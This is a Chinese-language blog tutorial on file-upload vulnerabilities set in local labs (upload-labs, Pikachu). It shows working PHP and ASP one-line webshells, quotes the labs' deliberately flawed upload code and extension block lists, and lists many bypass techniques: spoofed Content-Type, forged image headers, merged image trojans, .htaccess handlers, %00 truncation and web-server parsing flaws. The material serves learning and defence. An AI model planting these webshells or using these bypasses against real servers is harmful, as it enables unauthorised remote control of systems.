大家好!
我是小黄,很高兴又跟大家见面啦 !
拒绝水文,从我做起 !!!!
未经允许,禁止转载 ,违者必究!!!!
本实验仅适用于学习和测试 ,严禁违法操作 ! ! !
今天更新的是:
文件上传
】,即可获取本文全部涉及到的工具。创建时间:2021年5月9日
软件: MindMaster Pro
Web应用之上的远程控制程序
。一张网页
,由PHP、JSP、ASP、ASP.NET
等这类web应用程序语言开发,但webShell并不具备常见网页的功能,例如登录、注册、信息展示等功能,一般会具备文件管理、端口扫描、提权、获取系统信息等功能。大马
。小马
。一句话木马、菜刀马、脱库马
等等的名词,是对于webShell功能或者特性的简称。前期准备:
- 安装一下集成环境:这里推荐使用
PHPstudy 2018
、(PHPstudy 2018 可以在我的微信公众号获取)
- 安装好环境之后我们来编写一个一句话木马(如何编写我们之后详细讲解)
- 写好之后呢,我们进行本地利用。
phpStudy\PHPTutorial\WWW
目录下 @eval($_POST[x]); ?>
127.0.0.1/shell.php(我们刚才创建的木马文件名称)
HackBar(浏览器插件)
:尝试利用这个一句话木马来返回PHPinfo
的信息PHPinfo
的语句:X=phpinfo();
这也是一个任意代码执行,我们通过变量X
传递的任何指令都会被当做PHP
代码来执行。也可以通过这条指令来调用调用系统函数:X=system(whomai); 、x=system(whomai);
@eval($_POST[x]); ?>
$_POST[x]
: 获取 POST
请求参数中X的值。例如POST
请求中传递 x=phpinfo();
,那么 $_POST[x]
就等同于phpinfo();
eval()
将字符串当做PHP代码去执行。例如 eval('phpinfo();')
,其中 phpinfo();
会被当做PHP代码去执行。 @eval($_POST[x]); ?> 实际上的传递过程是这样的
↓
↓
↓
@eval('phpinfo();'); ?> 实际的语句是这样的
webshell
,传递任意PHP代码
,让其去执行,从而达到任意代码执行
。@
放置在一个PHP表达式之前,该表达式可能产生的任何错误信息都被 忽略
掉。<%eval request("x")%>
<%@ Page Language="Jscript"%><%eval (Request.Item["x"],"unsafe");%>
添加数据
猪猪
1234
@
会产生怎样的效果呢?文件上传功能
,例如头像更改,文章编辑,附件上传等等。本地文件上传至服务器上
进行保存。可以尝试用pickchu靶场进行复现。
假设文件上传功能没有对上传的文件进行限制,可能会引发哪些安全风险?
如果是对方是LAMP架构,是否能上传PHP的WebShell到服务端上,然后通过访问上传后的文件地址,从而执行WebShell中的代码。达到控制对方服务器的目的。
实验演示:
让我们禁用JS来跳过验证
来上传一句话木马
phpinfo
的信息。返回信息成功之后,让我们挂上蚁剑。没有对上传的文件做合理严谨的过滤
,导致用户可以利用此功能,上传能被服务端解析执行的文件
,并通过此文件获得执行服务端命令的能力
。打开upload-labs 靶场第一题 - JS检查
include '../config.php';
include '../head.php';
include '../menu.php';
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
//取出文件上传后临时存储的文件名
$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name'];
//生成一个新的文件存储路径,文件名保持文件上传前的文件名
if (move_uploaded_file($temp_file, $img_path)){
//move_uploaded_file函数把上传的文件移动到新的位置,成功则返回true,失败则返回false
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
?>
file_exists
函数检查文件或目录是否存在。如果指定的文件或目录存在则返回 TRUE,否则返回 FALSE。
UPLOAD_PATH
这个常量在config.php
文件中,有这么一段代码define("UPLOAD_PATH", "../upload");
,进行了设置。$_FILES['upload_file']['tmp_name']
又是哪儿冒出来的呢,upload_file
就是文件上传的表单的名字,如下图$_FILES
中的那些参数:$_FILES这个变量用与上传的文件参数设置,是一个多维数组
数组的用法就是 $_FILES['key']['key2'];
$_FILES['upfile']是你表单上传的文件信息数组,upfile是文件上传字段,在上传时由服务器根据上传字段设定。
$_FILES['upfile']包含了以下内容:
$_FILES['upfile']['name'] 客户端文件的原名称。
$_FILES['upfile']['type'] 文件的 MIME 类型,需要浏览器提供该信息的支持,例如"image/gif"。
$_FILES['upfile']['size'] 已上传文件的大小,单位为字节。
$_FILES['upfile']['tmp_name'] 文件被上传后在服务端储存的临时文件名。
$_FILES['upfile']['error'] 和该文件上传相关的错误代码。
<script type="text/javascript">
function checkFile() {
var file = document.getElementsByName('upload_file')[0].value;
//获取到文件名
if (file == null || file == "") {
alert("请选择要上传的文件!");
return false;
}
var allow_ext = ".jpg|.png|.gif";
//定义允许上传的文件类型
var ext_name = file.substring(file.lastIndexOf("."));
//提取上传文件的类型。
//通过lastIndexOf取到“.”的索引,再使用substring函数截取 .后缀名
if (allow_ext.indexOf(ext_name) == -1) {
//如果 allow_ext 中没有 ext_name字符串,则返回-1
var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
alert(errMsg);
return false;
}
//判断上传文件类型是否允许上传
}
</script>
个人倾向性于第一个,我觉得可以选择禁用JS简单快捷高效
,第二个的话功能比较多一些,但是也会禁用掉正常页面的JSphp
、再进行发送,从而实现文件上传“所有前端的验证机制都是不安全的”
,因为前端的东西是用户可控制的。内容类型的因特网标准。
打开upload-labs 靶场第二题 - JS检查
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name'];
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '文件类型不正确,请重新上传!';
}
} else {
$msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
}
}
$_FILES['upload_file']['type'
]获取到Content-Type字段
,并进行比较,如果是那三种类型就继续向下执行,否则进行提示。JPG: FF D8 FF EO 00 10 4A 46 49 46.
GIF:47 49 46 3839 61(GIF89a).
PNG:89 50 4E 47
打开upload-labs 靶场第十三题 - 图片马绕过
function getReailFileType($filename){
$file = fopen($filename, "rb");
$bin = fread($file, 2); //只读2字节
fclose($file);
$strInfo = @unpack("C2chars", $bin);
$typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
$fileType = '';
switch($typeCode){
case 255216:
$fileType = 'jpg';
break;
case 13780:
$fileType = 'png';
break;
case 7173:
$fileType = 'gif';
break;
default:
$fileType = 'unknown';
}
return $fileType;
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_type = getReailFileType($temp_file);
if($file_type == 'unknown'){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
方法一: 伪造文件头绕过方法
方法二: 利用服务器将木马文件解析成了图片文件,因此向其发送执行该文件的请求时,服务器只会返回这个“图片”文件,并不会执行相应命令。
利用 文件包含漏洞 可以将图片格式的文件当做php文件来解析执行:http://127.0.0.1/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2021/03/20/9439796055e7a8d1a39396276569.jpg&submit=提交查询
模板:http://127.0.0.1/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/上传文件的回显路径&submit=提交查询
- 在路径下准备好一句话木马.php和一张图片 .png (或者 .jpg )
- 输入系统指令:
copy 一张图片.png/b+一句话木马.php/a 生成图片名称.png
- 这样图片木马就合成好了
服务端没有将后缀名转换为统一格式进行比对
,导致可以上传后缀为pHp的文件,又因为Windows操作系统大小写不敏感
,所以.pHp扔回被当成PHP文件解析。$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
$file_ext = strtolower($file_ext); //转换为小写
.pHP
的文件成功。$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if(!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
.asp,.aspx,.php,.jsp
后缀的文件.phtml .phps .php5 .pht
AddType application/x-httpd-php .php .phtml .phps .php5 .pht
RAW
包中可以查找到文件上传的位置。http://127.0.0.1/upload/upload/202105181219104196.php5
http://127.0.0.1/upload/文件上传路径
该URL模板只适用该案例
黑名单的后缀名替换为空,但仅进行一次
。上传.phphpp后缀,替换php一次为空,则后缀$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = str_ireplace($deny_ext,"", $file_name);
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
黑名单规则不严谨
,在某些特定环境中某些特殊后缀名仍会被当做PHP文件解析。phplphp2/php3/php4lphp5/php6lphp7/phtlphtm/phtml可以通过设置可以将该目录下的所有文件作为php文件来解析
.htaccess
可以写入apache配置信息,改变当前目录以及子目录的Apache配置信息。 - AddType application/x-httpd-php.jpg
<FilesMatch "sec.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
window对于文件和文件名的限制
,以下字符放在结尾时,不符合操作系统的命名规范,在最后生成文件时,字符会被自动去除
。对应upland第6题
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = $_FILES['upload_file']['name'];
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件不允许上传';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
它不是空格,是NULL,空字符
。在文件扩展名验证时,是取文件的扩展名来做验证
,但是最后文件保存在本地时,%00会截断文件名,只保存%00之前的内容
。对应upland第11题
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
对应upland第19题
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = $_POST['save_name'];
$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!in_array($file_ext,$deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' .$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
}else{
$msg = '上传出错!';
}
}else{
$msg = '禁止保存为该类型文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
move_uploaded_file()函数
中的img_path
是由post参数save_name控制的
,因此可以在save_name利用00截断绕过
,方法同上从右到左
。例如shel.php.gix.ccc,apache会先识别ccc,ccc不被识别,则识别gix,以此类推,最后会被识别为php来运行。.asp、.asa、.cer,
则目录下的所有文件都会被作为ASPurl/test.asp/shell.jpg
会被当作asp脚本运行。.asp;、.asa;、.cer;。
url/test.asp;shell.jpg
会被当作asp脚本运行。.asa,.cer,.cdx
都会被作为asp文件执行。url/shell.asa
会被作为asp文件执行。url/shell.jpg/shell.php
时,shell.jpg
会被当作php去执行。了解
shell.jpg
文件,注意最后为空格url/shell.jpg[Ox20][Ox00].php
如果大家对博主还有其他的意见,或者对文章中有那些不明白可以私信博主,博主将尽心尽力为您解决。
各位路过的朋友,如果觉得可以学到些什么的话,点个赞 再走吧,欢迎各位路过的大佬评论,指正错误,也欢迎有问题的小伙伴评论留言,私信。
每个小伙伴的关注都是本人更新博客的动力!!!
请微信搜索【 在下小黄 】文章更新将在第一时间阅读 !
博客中若有不恰当的地方,请您一定要告诉我。前路崎岖,望我们可以互相帮助,并肩前行!